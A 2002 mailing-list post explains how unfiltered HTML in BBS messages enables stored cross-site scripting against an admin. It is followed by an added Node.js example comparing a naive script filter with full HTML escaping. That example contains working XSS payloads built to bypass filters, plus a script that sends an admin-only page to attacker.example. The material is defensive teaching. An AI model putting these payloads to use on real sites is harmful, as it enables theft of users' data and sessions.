[Empeg-general] Re: HTML code in BBS post
Andy Norman
nospam at focus.demon.co.uk
Wed, 20 Mar 2002 14:24:00 GMT
But tell me how allowing HTML to be added to BBS posts can "allow control of a server!"
If the BBS software doesn't correctly filter JavaScript and VBScript from any HTML posted to it then it is indeed possible to get access to server functionality that you shouldn't be able to get to.
It works like this:
I post some HTML in a message to the BBS, with some carefully crafted JavaScript or VBScript embedded in it
the BBS admin opens up the message
the BBS software has failed to filter my script out properly
my script gets to run
my script is now running in the admin's browser and therefore with all the admin's rights
my script then gets clever and manages to access the BBS areas that are off limits to me normally (this bit is much easier to do if MS XML is installed on the admin's machine as I can then make arbitrary calls against pages on the BBS easily, complete with the admin's cookies)
if the settings on the admin's browser are sloppy enough then I can also mess around with data on their machine (the same applies to other users' machines too)
If I am very careful then all of this could happen without the admin being aware that anything is amiss.
Now, this does all rely on everything being in place on both the server and the browser, the attacker having good knowledge of the BBS code, etc.
However this stuff is entirely possible, similar attacks have been demonstrated on public systems before (both Amazon and Yahoo had lousy script filtering at one point).
I have demonstrated such an attack on several intranet apps at places I have worked, so this stuff can be a real security risk.
Unfortunately filtering out the script while leaving the HTML intact can be quite difficult to get working 100%, so given that the BBS code was not written by Paul and so he couldn't trust it 100% I think he probably took the right decision to turn HTML markup off. The intranet apps I mention above (which are sold to third parties) now do not allow HTML markup in any data posted to them.
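The following is an added illustration of the two points in the post above (that "filter the script out" is hard to get right, and that turning HTML markup off sidesteps the problem); it is not code from the post, from Andy Norman, or from the BBS software. It runs under Node.js with no dependencies. The attacker payloads, the admin-only path /admin/users.cgi and the host attacker.example are all constructed for the example; the XMLHttpRequest call stands in for the "arbitrary calls against pages on the BBS, complete with the admin's cookies" the post describes.

```javascript
// Added example, not from the original post. Compares a naive "strip <script>"
// filter against treating posts as plain text (escaping all markup).

// A naive filter of the kind a BBS might ship: remove <script>...</script> blocks.
// It is case-sensitive and only knows about one way of running script.
function naiveStripScript(html) {
  return html.replace(/<script\b[^>]*>[\s\S]*?<\/script>/g, '');
}

// The alternative the post ends up endorsing: no HTML markup at all.
// Escaping the significant characters means the browser never sees a tag.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return text.replace(/[&<>"']/g, c => map[c]);
}

// Constructed attacker script: runs in the admin's browser, fetches an
// admin-only page with the admin's cookies and ships it to the attacker.
// /admin/users.cgi and attacker.example are hypothetical.
const STEAL = "var x=new XMLHttpRequest();x.open('GET','/admin/users.cgi');" +
  "x.onload=function(){new Image().src='//attacker.example/?'+escape(x.responseText)};x.send()";

// Constructed payloads a poster could embed in a message.
const PAYLOADS = {
  plainScriptTag: `<script>${STEAL}</script>`,
  uppercaseTag:   `<SCRIPT>${STEAL}</SCRIPT>`,       // defeats a case-sensitive regex
  eventHandler:   `<img src=x onerror="${STEAL}">`,  // no <script> tag at all
  javascriptUrl:  `<a href="javascript:${STEAL}">click</a>`,
};

// Rough check: does the filtered output still contain something a browser
// would execute? (A script tag, an on* handler inside a tag, or a javascript: URL.)
function stillExecutable(html) {
  return /<script\b/i.test(html) ||
    /<\w+[^>]*\son\w+\s*=/i.test(html) ||
    /<\w+[^>]*\s(?:href|src)\s*=\s*["']?\s*javascript:/i.test(html);
}

// Run every payload through a filter; true means the attack survives it.
function evaluate(filter) {
  const result = {};
  for (const [name, payload] of Object.entries(PAYLOADS)) {
    result[name] = stillExecutable(filter(payload));
  }
  return result;
}

console.log('naive strip-script filter:', evaluate(naiveStripScript));
console.log('escape everything:        ', evaluate(escapeHtml));
```

Only the first payload is caught by the naive filter; the other three reach the admin's browser intact. The escaping path neutralises all four, at the cost of losing HTML markup entirely, which is the trade-off the post describes.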